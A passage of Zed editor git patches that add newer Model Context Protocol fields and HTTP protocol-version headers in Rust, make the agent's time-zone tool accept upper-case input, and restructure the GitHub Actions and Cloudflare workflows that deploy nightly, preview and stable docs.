+ title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -1999,6 +2008,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { vec![ context_server::types::Tool { name: "a".repeat(MAX_TOOL_NAME_LENGTH - 2), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -2006,6 +2016,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { }, context_server::types::Tool { name: "b".repeat(MAX_TOOL_NAME_LENGTH - 1), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -2013,6 +2024,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { }, context_server::types::Tool { name: "c".repeat(MAX_TOOL_NAME_LENGTH + 1), + title: None, description: None, input_schema: json!({"type": "object", "properties": {}}), output_schema: None, @@ -2028,6 +2040,7 @@ async fn test_mcp_tool_truncation(cx: &mut TestAppContext) { "Azure DevOps", vec![context_server::types::Tool { name: "echo".into(), // Also conflicts - will be disambiguated as azure_dev_ops_echo + title: None, description: None, input_schema: serde_json::to_value(EchoTool::input_schema( LanguageModelToolSchemaFormat::JsonSchema, @@ -4406,7 +4419,9 @@ fn setup_context_server( ), server_info: context_server::types::Implementation { name: name.into(), + title: None, version: "1.0.0".to_string(), + description: None, }, capabilities: context_server::types::ServerCapabilities { tools: Some(context_server::types::ToolsCapabilities { diff --git a/crates/agent/src/tools/context_server_registry.rs b/crates/agent/src/tools/context_server_registry.rs index 261c89e6b80e7d..9948b587f4fcec 100644 --- a/crates/agent/src/tools/context_server_registry.rs +++ b/crates/agent/src/tools/context_server_registry.rs @@ -410,6 +410,9 @@ impl AnyAgentTool for ContextServerTool { context_server::types::ToolResponseContent::Resource { .. 
} => { log::warn!("Ignoring resource content from tool response"); } + context_server::types::ToolResponseContent::ResourceLink { .. } => { + log::warn!("Ignoring resource link content from tool response"); + } } } let raw_output = serde_json::Value::String(concatenated_text); diff --git a/crates/context_server/src/client.rs b/crates/context_server/src/client.rs index 676baef97326b4..1c433d9fd345c5 100644 --- a/crates/context_server/src/client.rs +++ b/crates/context_server/src/client.rs @@ -474,6 +474,13 @@ impl Client { Ok(()) } + /// Notify the underlying transport of the negotiated MCP protocol version + /// so it can stamp subsequent requests (e.g. HTTP's `MCP-Protocol-Version` + /// header required from 2025-06-18 onward). + pub(crate) fn set_protocol_version(&self, version: &str) { + self.transport.set_protocol_version(version); + } + #[must_use] pub fn on_notification( &self, diff --git a/crates/context_server/src/context_server.rs b/crates/context_server/src/context_server.rs index e7e063efa9d6e9..05a3451ea863a3 100644 --- a/crates/context_server/src/context_server.rs +++ b/crates/context_server/src/context_server.rs @@ -138,7 +138,9 @@ impl ContextServer { let protocol = crate::protocol::ModelContextProtocol::new(client); let client_info = types::Implementation { name: "Zed".to_string(), + title: None, version: env!("CARGO_PKG_VERSION").to_string(), + description: None, }; let initialized_protocol = protocol.initialize(client_info).await?; diff --git a/crates/context_server/src/listener.rs b/crates/context_server/src/listener.rs index 2e395e493cc98a..a9be4c07a26dc6 100644 --- a/crates/context_server/src/listener.rs +++ b/crates/context_server/src/listener.rs @@ -103,6 +103,7 @@ impl McpServer { let registered_tool = RegisteredTool { tool: Tool { name: T::NAME.into(), + title: None, description, input_schema: input_schema.into(), output_schema: if TypeId::of::() == TypeId::of::<()>() { diff --git a/crates/context_server/src/protocol.rs 
b/crates/context_server/src/protocol.rs index a218a8a3e0e635..05082637c276ff 100644 --- a/crates/context_server/src/protocol.rs +++ b/crates/context_server/src/protocol.rs @@ -27,6 +27,8 @@ impl ModelContextProtocol { fn supported_protocols() -> Vec { vec![ types::ProtocolVersion(types::LATEST_PROTOCOL_VERSION.to_string()), + types::ProtocolVersion(types::VERSION_2025_06_18.to_string()), + types::ProtocolVersion(types::VERSION_2025_03_26.to_string()), types::ProtocolVersion(types::VERSION_2024_11_05.to_string()), ] } @@ -59,6 +61,11 @@ impl ModelContextProtocol { log::trace!("mcp server info {:?}", response.server_info); + // Per MCP 2025-06-18, HTTP transport must attach the negotiated version + // as `MCP-Protocol-Version` on every post-initialize request. + self.inner + .set_protocol_version(&response.protocol_version.0); + let initialized_protocol = InitializedContextServerProtocol { inner: self.inner, initialize: response, diff --git a/crates/context_server/src/test.rs b/crates/context_server/src/test.rs index 008542ab246bc2..b1e457975f916d 100644 --- a/crates/context_server/src/test.rs +++ b/crates/context_server/src/test.rs @@ -27,7 +27,9 @@ fn create_initialize_response(server_name: String) -> InitializeResponse { protocol_version: ProtocolVersion(crate::types::LATEST_PROTOCOL_VERSION.to_string()), server_info: Implementation { name: server_name, + title: None, version: "1.0.0".to_string(), + description: None, }, capabilities: ServerCapabilities::default(), meta: None, diff --git a/crates/context_server/src/transport.rs b/crates/context_server/src/transport.rs index a3d6f998d49872..bffd7e4c4d84a8 100644 --- a/crates/context_server/src/transport.rs +++ b/crates/context_server/src/transport.rs @@ -14,4 +14,9 @@ pub trait Transport: Send + Sync { async fn send(&self, message: String) -> Result<()>; fn receive(&self) -> Pin + Send>>; fn receive_err(&self) -> Pin + Send>>; + + /// Called after the MCP initialize handshake completes so transports that + /// need 
the negotiated version (currently only HTTP, which must attach an + /// `MCP-Protocol-Version` header from 2025-06-18 onward) can pick it up. + fn set_protocol_version(&self, _version: &str) {} } diff --git a/crates/context_server/src/transport/http.rs b/crates/context_server/src/transport/http.rs index 47e31c7abc7b1d..bf374586b35fb5 100644 --- a/crates/context_server/src/transport/http.rs +++ b/crates/context_server/src/transport/http.rs @@ -9,6 +9,7 @@ use std::{pin::Pin, sync::Arc}; use crate::oauth::{self, OAuthTokenProvider, WwwAuthenticate}; use crate::transport::Transport; +use crate::types; /// Typed errors returned by the HTTP transport that callers can downcast from /// `anyhow::Error` to handle specific failure modes. @@ -33,6 +34,7 @@ impl std::error::Error for TransportError {} // Constants from MCP spec const HEADER_SESSION_ID: &str = "Mcp-Session-Id"; +const HEADER_PROTOCOL_VERSION: &str = "MCP-Protocol-Version"; const EVENT_STREAM_MIME_TYPE: &str = "text/event-stream"; const JSON_MIME_TYPE: &str = "application/json"; @@ -41,6 +43,11 @@ pub struct HttpTransport { http_client: Arc, endpoint: String, session_id: Arc>>, + /// Negotiated MCP protocol version, populated by `set_protocol_version` + /// after the initialize handshake. From 2025-06-18 onward the server + /// requires clients to echo this in the `MCP-Protocol-Version` header on + /// every subsequent request. + protocol_version: Arc>>, executor: BackgroundExecutor, response_tx: async_channel::Sender, response_rx: async_channel::Receiver, @@ -78,6 +85,7 @@ impl HttpTransport { executor, endpoint, session_id: Arc::new(SyncMutex::new(None)), + protocol_version: Arc::new(SyncMutex::new(None)), response_tx, response_rx, error_tx, @@ -114,6 +122,14 @@ impl HttpTransport { request_builder = request_builder.header(HEADER_SESSION_ID, session_id.as_str()); } + // Echo the negotiated protocol version once initialization has + // completed. Required by servers speaking MCP 2025-06-18 or later. 
+ if let Some(ref version) = *self.protocol_version.lock() + && types::requires_protocol_version_header(version) + { + request_builder = request_builder.header(HEADER_PROTOCOL_VERSION, version.as_str()); + } + Ok(request_builder.body(AsyncBody::from(message.to_vec()))?) } @@ -315,6 +331,10 @@ impl Transport for HttpTransport { fn receive_err(&self) -> Pin + Send>> { Box::pin(self.error_rx.clone()) } + + fn set_protocol_version(&self, version: &str) { + *self.protocol_version.lock() = Some(version.to_string()); + } } impl Drop for HttpTransport { @@ -323,6 +343,7 @@ impl Drop for HttpTransport { let http_client = self.http_client.clone(); let endpoint = self.endpoint.clone(); let session_id = self.session_id.lock().clone(); + let protocol_version = self.protocol_version.lock().clone(); let headers = self.headers.clone(); let access_token = self.token_provider.as_ref().and_then(|p| p.access_token()); @@ -345,6 +366,15 @@ impl Drop for HttpTransport { request_builder.header("Authorization", format!("Bearer {}", token)); } + // Stamp the negotiated MCP protocol version on the DELETE + // too, matching what `build_request` does for POSTs. 
+ if let Some(ref version) = protocol_version + && types::requires_protocol_version_header(version) + { + request_builder = + request_builder.header(HEADER_PROTOCOL_VERSION, version.as_str()); + } + let request = request_builder.body(AsyncBody::empty()); if let Ok(request) = request { diff --git a/crates/context_server/src/types.rs b/crates/context_server/src/types.rs index 81a427a289347a..803f11b4ccd92f 100644 --- a/crates/context_server/src/types.rs +++ b/crates/context_server/src/types.rs @@ -5,8 +5,16 @@ use url::Url; use crate::client::RequestId; -pub const LATEST_PROTOCOL_VERSION: &str = "2025-03-26"; pub const VERSION_2024_11_05: &str = "2024-11-05"; +pub const VERSION_2025_03_26: &str = "2025-03-26"; +pub const VERSION_2025_06_18: &str = "2025-06-18"; +pub const LATEST_PROTOCOL_VERSION: &str = "2025-11-25"; + +/// Protocol versions that include the streamable HTTP transport's +/// `MCP-Protocol-Version` header requirement on post-initialize requests. +pub fn requires_protocol_version_header(version: &str) -> bool { + matches!(version, VERSION_2025_06_18 | LATEST_PROTOCOL_VERSION) +} pub mod requests { use super::*; @@ -209,10 +217,21 @@ pub struct CompletionCompleteParams { #[serde(rename = "ref")] pub reference: CompletionReference, pub argument: CompletionArgument, + /// Previously-resolved argument values so the server can provide + /// context-sensitive completions (added in MCP 2025-06-18). 
+ #[serde(skip_serializing_if = "Option::is_none")] + pub context: Option, #[serde(rename = "_meta", skip_serializing_if = "Option::is_none")] pub meta: Option>, } +#[derive(Debug, Serialize, Deserialize)] +#[serde(rename_all = "camelCase")] +pub struct CompletionContext { + #[serde(skip_serializing_if = "Option::is_none")] + pub arguments: Option>, +} + #[derive(Debug, Serialize, Deserialize)] #[serde(untagged)] pub enum CompletionReference { @@ -421,6 +440,9 @@ pub struct CompletionResult { #[serde(rename_all = "camelCase")] pub struct Prompt { pub name: String, + /// Human-readable display name (added in MCP 2025-06-18). + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, #[serde(skip_serializing_if = "Option::is_none")] pub description: Option, #[serde(skip_serializing_if = "Option::is_none")] @@ -431,6 +453,9 @@ pub struct Prompt { #[serde(rename_all = "camelCase")] pub struct PromptArgument { pub name: String, + /// Human-readable display name (added in MCP 2025-06-18). + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, #[serde(skip_serializing_if = "Option::is_none")] pub description: Option, #[serde(skip_serializing_if = "Option::is_none")] @@ -499,6 +524,9 @@ pub struct RootsCapabilities { #[serde(rename_all = "camelCase")] pub struct Tool { pub name: String, + /// Human-readable display name (added in MCP 2025-06-18). + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, #[serde(skip_serializing_if = "Option::is_none")] pub description: Option, pub input_schema: serde_json::Value, @@ -532,7 +560,13 @@ pub struct ToolAnnotations { #[serde(rename_all = "camelCase")] pub struct Implementation { pub name: String, + /// Human-readable display name (added in MCP 2025-06-18). + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, pub version: String, + /// Human-readable description of the implementation (added in MCP 2025-11-25). 
+ #[serde(skip_serializing_if = "Option::is_none")] + pub description: Option, } #[derive(Debug, Serialize, Deserialize)] @@ -540,6 +574,9 @@ pub struct Implementation { pub struct Resource { pub uri: Url, pub name: String, + /// Human-readable display name (added in MCP 2025-06-18). + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, #[serde(skip_serializing_if = "Option::is_none")] pub description: Option, #[serde(skip_serializing_if = "Option::is_none")] @@ -577,6 +614,9 @@ pub struct BlobResourceContents { pub struct ResourceTemplate { pub uri_template: String, pub name: String, + /// Human-readable display name (added in MCP 2025-06-18). + #[serde(skip_serializing_if = "Option::is_none")] + pub title: Option, #[serde(skip_serializing_if = "Option::is_none")] pub description: Option, #[serde(skip_serializing_if = "Option::is_none")] @@ -709,6 +749,19 @@ pub enum ToolResponseContent { Audio { data: String, mime_type: String }, #[serde(rename = "resource")] Resource { resource: ResourceContents }, + /// Link to an MCP resource on the server, without inlining its contents. + /// Added in MCP 2025-06-18. 
+ #[serde(rename = "resource_link", rename_all = "camelCase")] + ResourceLink { + uri: Url, + name: String, + #[serde(skip_serializing_if = "Option::is_none")] + title: Option, + #[serde(skip_serializing_if = "Option::is_none")] + description: Option, + #[serde(skip_serializing_if = "Option::is_none")] + mime_type: Option, + }, } impl ToolResponseContent { From 491f8dc9e0fb8e04d9a67ade0ddfc73b64a9209f Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Thu, 30 Apr 2026 12:15:36 +0300 Subject: [PATCH 112/231] tools: Make time-zones more case-insensitive (#55288) gpt-5.5 likes to call the `now` tool with upper-case "UTC", leading to this error: > Failed to receive tool input: tool input was not fully received Release Notes: - N/A --- crates/agent/src/tools/now_tool.rs | 2 ++ 1 file changed, 2 insertions(+) diff --git a/crates/agent/src/tools/now_tool.rs b/crates/agent/src/tools/now_tool.rs index 04aba44ff3a1f4..9721c923b6e8d2 100644 --- a/crates/agent/src/tools/now_tool.rs +++ b/crates/agent/src/tools/now_tool.rs @@ -13,8 +13,10 @@ use crate::{AgentTool, ToolCallEventStream, ToolInput}; #[schemars(inline)] pub enum Timezone { /// Use UTC for the datetime. + #[serde(alias = "UTC", alias = "Utc")] Utc, /// Use local time for the datetime. + #[serde(alias = "LOCAL", alias = "Local")] Local, } From b3d5bf07ad4b944d2b478773c81ac1915767c8f2 Mon Sep 17 00:00:00 2001 From: Ben Kunkle Date: Thu, 30 Apr 2026 06:10:14 -0500 Subject: [PATCH 113/231] Staged docs releases (#50136) Closes #ISSUE Before you mark this PR as ready for review, make sure that you have: - [x] Added a solid test coverage and/or screenshots from doing manual testing - [x] Done a self-review taking into account security and performance aspects - [x] Aligned any UI changes with the [UI checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) Release Notes: - N/A *or* Added/Fixed/Improved ... 
--- .cloudflare/README.md | 4 +- .cloudflare/docs-proxy/src/worker.js | 17 +- .github/actions/build_docs/action.yml | 46 --- .github/workflows/after_release.yml | 26 +- .github/workflows/deploy_cloudflare.yml | 64 ---- .github/workflows/deploy_docs.yml | 153 ++++++++ .github/workflows/deploy_nightly_docs.yml | 23 ++ .github/workflows/run_tests.yml | 24 +- crates/docs_preprocessor/src/main.rs | 7 + docs/theme/index.hbs | 1 + tooling/xtask/src/tasks/workflows.rs | 3 + .../src/tasks/workflows/after_release.rs | 54 +-- .../xtask/src/tasks/workflows/deploy_docs.rs | 360 ++++++++++++++++++ .../xtask/src/tasks/workflows/run_tests.rs | 51 +-- tooling/xtask/src/tasks/workflows/steps.rs | 2 + tooling/xtask/src/tasks/workflows/vars.rs | 3 + 16 files changed, 639 insertions(+), 199 deletions(-) delete mode 100644 .github/actions/build_docs/action.yml delete mode 100644 .github/workflows/deploy_cloudflare.yml create mode 100644 .github/workflows/deploy_docs.yml create mode 100644 .github/workflows/deploy_nightly_docs.yml create mode 100644 tooling/xtask/src/tasks/workflows/deploy_docs.rs diff --git a/.cloudflare/README.md b/.cloudflare/README.md index d21377ddffd425..8da1a129fee25c 100644 --- a/.cloudflare/README.md +++ b/.cloudflare/README.md @@ -4,11 +4,11 @@ from Cloudflare. - `open-source-website-assets` is used for `install.sh` - `docs-proxy` is used for `https://zed.dev/docs` -On push to `main`, both of these (and the files they depend on) are uploaded to Cloudflare. +During docs deployments, both of these (and the files they depend on) are uploaded to Cloudflare. ### Deployment -These functions are deployed on push to main by the deploy_cloudflare.yml workflow. Worker Rules in Cloudflare intercept requests to zed.dev and proxy them to the appropriate workers. +These functions are deployed by the docs deployment workflows. Worker Rules in Cloudflare intercept requests to zed.dev and proxy them to the appropriate workers. 
### Testing diff --git a/.cloudflare/docs-proxy/src/worker.js b/.cloudflare/docs-proxy/src/worker.js index f9f441883ad9b8..08b0265fafbbb0 100644 --- a/.cloudflare/docs-proxy/src/worker.js +++ b/.cloudflare/docs-proxy/src/worker.js @@ -1,7 +1,22 @@ export default { async fetch(request, _env, _ctx) { const url = new URL(request.url); - url.hostname = "docs-anw.pages.dev"; + + if (url.pathname === "/docs/nightly") { + url.hostname = "docs-nightly.pages.dev"; + url.pathname = "/docs/"; + } else if (url.pathname.startsWith("/docs/nightly/")) { + url.hostname = "docs-nightly.pages.dev"; + url.pathname = url.pathname.replace("/docs/nightly/", "/docs/"); + } else if (url.pathname === "/docs/preview") { + url.hostname = "docs-preview-5xd.pages.dev"; + url.pathname = "/docs/"; + } else if (url.pathname.startsWith("/docs/preview/")) { + url.hostname = "docs-preview-5xd.pages.dev"; + url.pathname = url.pathname.replace("/docs/preview/", "/docs/"); + } else { + url.hostname = "docs-anw.pages.dev"; + } let res = await fetch(url, request); diff --git a/.github/actions/build_docs/action.yml b/.github/actions/build_docs/action.yml deleted file mode 100644 index 002f6f4653f894..00000000000000 --- a/.github/actions/build_docs/action.yml +++ /dev/null @@ -1,46 +0,0 @@ -name: "Build docs" -description: "Build the docs" - -runs: - using: "composite" - steps: - - name: Setup mdBook - uses: peaceiris/actions-mdbook@ee69d230fe19748b7abf22df32acaa93833fad08 # v2 - with: - mdbook-version: "0.4.37" - - - name: Cache dependencies - uses: swatinem/rust-cache@9d47c6ad4b02e050fd481d890b2ea34778fd09d6 # v2 - with: - save-if: ${{ github.ref == 'refs/heads/main' }} - # cache-provider: "buildjet" - - - name: Install Linux dependencies - shell: bash -euxo pipefail {0} - run: ./script/linux - - - name: Download WASI SDK - shell: bash -euxo pipefail {0} - run: ./script/download-wasi-sdk - - - name: Generate action metadata - shell: bash -euxo pipefail {0} - run: ./script/generate-action-metadata - - - 
name: Check for broken links (in MD) - uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 # v2.4.1 - with: - args: --no-progress --exclude '^http' './docs/src/**/*' - fail: true - - - name: Build book - shell: bash -euxo pipefail {0} - run: | - mkdir -p target/deploy - mdbook build ./docs --dest-dir=../target/deploy/docs/ - - - name: Check for broken links (in HTML) - uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 # v2.4.1 - with: - args: --no-progress --exclude '^http' 'target/deploy/docs/' - fail: true diff --git a/.github/workflows/after_release.yml b/.github/workflows/after_release.yml index ab2220764861b1..f6777aa2c00b38 100644 --- a/.github/workflows/after_release.yml +++ b/.github/workflows/after_release.yml @@ -1,6 +1,9 @@ # Generated from xtask::workflows::after_release # Rebuild with `cargo xtask workflows`. name: after_release +env: + TAG_NAME: ${{ github.event.release.tag_name || inputs.tag_name }} + IS_PRERELEASE: ${{ github.event.release.prerelease || inputs.prerelease }} on: release: types: @@ -25,7 +28,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: after_release::rebuild_releases_page::refresh_cloud_releases - run: curl -fX POST https://cloud.zed.dev/releases/refresh?expect_tag=${{ github.event.release.tag_name || inputs.tag_name }} + run: curl -fX POST "https://cloud.zed.dev/releases/refresh?expect_tag=$TAG_NAME" - name: steps::checkout_repo uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: @@ -34,6 +37,18 @@ jobs: run: ./script/redeploy-vercel env: VERCEL_TOKEN: ${{ secrets.VERCEL_TOKEN }} + deploy_docs: + if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') + permissions: + contents: read + uses: zed-industries/zed/.github/workflows/deploy_docs.yml@main + secrets: + DOCS_AMPLITUDE_API_KEY: ${{ secrets.DOCS_AMPLITUDE_API_KEY }} + CLOUDFLARE_API_TOKEN: ${{ secrets.CLOUDFLARE_API_TOKEN }} + CLOUDFLARE_ACCOUNT_ID: ${{ 
secrets.CLOUDFLARE_ACCOUNT_ID }} + with: + channel: ${{ (github.event.release.prerelease || inputs.prerelease) && 'preview' || 'stable' }} + checkout_ref: ${{ github.event.release.tag_name || inputs.tag_name }} post_to_discord: needs: - rebuild_releases_page @@ -43,7 +58,7 @@ jobs: - id: get-release-url name: after_release::post_to_discord::get_release_url run: | - if [ "${{ github.event.release.prerelease || inputs.prerelease }}" == "true" ]; then + if [ "$IS_PRERELEASE" == "true" ]; then URL="https://zed.dev/releases/preview" else URL="https://zed.dev/releases/stable" @@ -55,7 +70,7 @@ jobs: uses: 2428392/gh-truncate-string-action@b3ff790d21cf42af3ca7579146eedb93c8fb0757 with: stringToTruncate: | - 📣 Zed [${{ github.event.release.tag_name || inputs.tag_name }}](<${{ steps.get-release-url.outputs.URL }}>) was just released! + 📣 Zed [${{ env.TAG_NAME }}](<${{ steps.get-release-url.outputs.URL }}>) was just released! ${{ github.event.release.body || inputs.body }} maxLength: 2000 @@ -90,7 +105,7 @@ jobs: - id: set-package-name name: after_release::publish_winget::set_package_name run: | - if ("${{ github.event.release.prerelease || inputs.prerelease }}" -eq "true") { + if ($env:IS_PRERELEASE -eq "true") { $PACKAGE_NAME = "ZedIndustries.Zed.Preview" } else { $PACKAGE_NAME = "ZedIndustries.Zed" @@ -102,7 +117,7 @@ jobs: uses: vedantmgoyal9/winget-releaser@19e706d4c9121098010096f9c495a70a7518b30f with: identifier: ${{ steps.set-package-name.outputs.PACKAGE_NAME }} - release-tag: ${{ github.event.release.tag_name || inputs.tag_name }} + release-tag: ${{ env.TAG_NAME }} max-versions-to-keep: 5 token: ${{ secrets.WINGET_TOKEN }} create_sentry_release: @@ -127,6 +142,7 @@ jobs: - post_to_discord - publish_winget - create_sentry_release + - deploy_docs if: failure() runs-on: namespace-profile-2x4-ubuntu-2404 steps: diff --git a/.github/workflows/deploy_cloudflare.yml b/.github/workflows/deploy_cloudflare.yml deleted file mode 100644 index 4e029c63ccd8a0..00000000000000 --- 
a/.github/workflows/deploy_cloudflare.yml +++ /dev/null @@ -1,64 +0,0 @@ -name: Deploy Docs - -on: - push: - branches: - - main - -jobs: - deploy-docs: - name: Deploy Docs - if: github.repository_owner == 'zed-industries' - runs-on: namespace-profile-16x32-ubuntu-2204 - - steps: - - name: Checkout repo - uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 - with: - clean: false - - - name: Set up default .cargo/config.toml - run: cp ./.cargo/collab-config.toml ./.cargo/config.toml - - - name: Build docs - uses: ./.github/actions/build_docs - env: - CC: clang - CXX: clang++ - DOCS_AMPLITUDE_API_KEY: ${{ secrets.DOCS_AMPLITUDE_API_KEY }} - DOCS_CONSENT_IO_INSTANCE: ${{ secrets.DOCS_CONSENT_IO_INSTANCE }} - - - name: Deploy Docs - uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 # v3 - with: - apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} - accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} - command: pages deploy target/deploy --project-name=docs - - - name: Deploy Install - uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 # v3 - with: - apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} - accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} - command: r2 object put -f script/install.sh zed-open-source-website-assets/install.sh - - - name: Deploy Docs Workers - uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 # v3 - with: - apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} - accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} - command: deploy .cloudflare/docs-proxy/src/worker.js - - - name: Deploy Install Workers - uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 # v3 - with: - apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} - accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} - command: deploy .cloudflare/docs-proxy/src/worker.js - - - name: Preserve Wrangler logs - uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4 - if: always() - with: - name: 
wrangler_logs - path: /home/runner/.config/.wrangler/logs/ diff --git a/.github/workflows/deploy_docs.yml b/.github/workflows/deploy_docs.yml new file mode 100644 index 00000000000000..1739b6b257a953 --- /dev/null +++ b/.github/workflows/deploy_docs.yml @@ -0,0 +1,153 @@ +# Generated from xtask::workflows::deploy_docs +# Rebuild with `cargo xtask workflows`. +name: deploy_docs +on: + workflow_call: + inputs: + channel: + description: channel + type: string + default: '' + checkout_ref: + description: checkout_ref + type: string + default: '' + secrets: + DOCS_AMPLITUDE_API_KEY: + description: DOCS_AMPLITUDE_API_KEY + required: true + CLOUDFLARE_API_TOKEN: + description: CLOUDFLARE_API_TOKEN + required: true + CLOUDFLARE_ACCOUNT_ID: + description: CLOUDFLARE_ACCOUNT_ID + required: true + workflow_dispatch: + inputs: + channel: + description: 'Docs channel to deploy: nightly, preview, or stable' + type: string + default: '' + checkout_ref: + description: Git ref to checkout and deploy. Defaults to event SHA when omitted. + type: string + default: '' +jobs: + deploy_docs: + if: github.repository_owner == 'zed-industries' + name: Build and Deploy Docs + runs-on: namespace-profile-16x32-ubuntu-2204 + env: + DOCS_AMPLITUDE_API_KEY: ${{ secrets.DOCS_AMPLITUDE_API_KEY }} + CC: clang + CXX: clang++ + steps: + - id: resolve-channel + name: deploy_docs::resolve_channel_step + run: | + if [ -z "$CHANNEL" ]; then + if [ "$GITHUB_REF" = "refs/heads/main" ]; then + CHANNEL="nightly" + else + echo "::error::channel input is required when ref is not main." + exit 1 + fi + fi + + case "$CHANNEL" in + "nightly") + SITE_URL="/docs/nightly/" + PROJECT_NAME="docs-nightly" + ;; + "preview") + SITE_URL="/docs/preview/" + PROJECT_NAME="docs-preview" + ;; + "stable") + SITE_URL="/docs/" + PROJECT_NAME="docs" + ;; + *) + echo "::error::Invalid docs channel '$CHANNEL'. Expected one of: nightly, preview, stable." 
+ exit 1 + ;; + esac + + { + echo "channel=$CHANNEL" + echo "site_url=$SITE_URL" + echo "project_name=$PROJECT_NAME" + } >> "$GITHUB_OUTPUT" + env: + CHANNEL: ${{ inputs.channel }} + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + ref: ${{ inputs.checkout_ref != '' && inputs.checkout_ref || github.sha }} + - name: steps::setup_cargo_config + run: | + mkdir -p ./../.cargo + cp ./.cargo/ci-config.toml ./../.cargo/config.toml + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup + - name: steps::setup_linux + run: ./script/linux + - name: steps::download_wasi_sdk + run: ./script/download-wasi-sdk + - name: ./script/generate-action-metadata + run: ./script/generate-action-metadata + - name: deploy_docs::lychee_link_check + uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 + with: + args: --no-progress --exclude '^http' './docs/src/**/*' + fail: true + jobSummary: false + - name: deploy_docs::install_mdbook + uses: peaceiris/actions-mdbook@ee69d230fe19748b7abf22df32acaa93833fad08 + with: + mdbook-version: 0.4.37 + - name: deploy_docs::build_docs_book + run: | + mkdir -p target/deploy + mdbook build ./docs --dest-dir=../target/deploy/docs/ + env: + DOCS_CHANNEL: ${{ steps.resolve-channel.outputs.channel }} + MDBOOK_BOOK__SITE_URL: ${{ steps.resolve-channel.outputs.site_url }} + - name: deploy_docs::lychee_link_check + uses: lycheeverse/lychee-action@82202e5e9c2f4ef1a55a3d02563e1cb6041e5332 + with: + args: --no-progress --exclude '^http' 'target/deploy/docs' + fail: true + jobSummary: false + - name: deploy_docs::docs_deploy_steps::deploy_to_cf_pages + uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 + with: + apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} + accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} + command: pages deploy 
target/deploy --project-name=${{ steps.resolve-channel.outputs.project_name }} --branch main + - name: deploy_docs::docs_deploy_steps::upload_install_script + uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 + with: + apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} + accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} + command: r2 object put -f script/install.sh zed-open-source-website-assets/install.sh + - name: deploy_docs::docs_deploy_steps::deploy_docs_worker + uses: cloudflare/wrangler-action@da0e0dfe58b7a431659754fdf3f186c529afbe65 + with: + apiToken: ${{ secrets.CLOUDFLARE_API_TOKEN }} + accountId: ${{ secrets.CLOUDFLARE_ACCOUNT_ID }} + command: deploy .cloudflare/docs-proxy/src/worker.js + - name: deploy_docs::docs_deploy_steps::upload_wrangler_logs + if: always() + uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 + with: + name: wrangler_logs + path: /home/runner/.config/.wrangler/logs/ + timeout-minutes: 60 +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/deploy_nightly_docs.yml b/.github/workflows/deploy_nightly_docs.yml new file mode 100644 index 00000000000000..340713e0a41d1a --- /dev/null +++ b/.github/workflows/deploy_nightly_docs.yml @@ -0,0 +1,23 @@ +# Generated from xtask::workflows::deploy_nightly_docs +# Rebuild with `cargo xtask workflows`. 
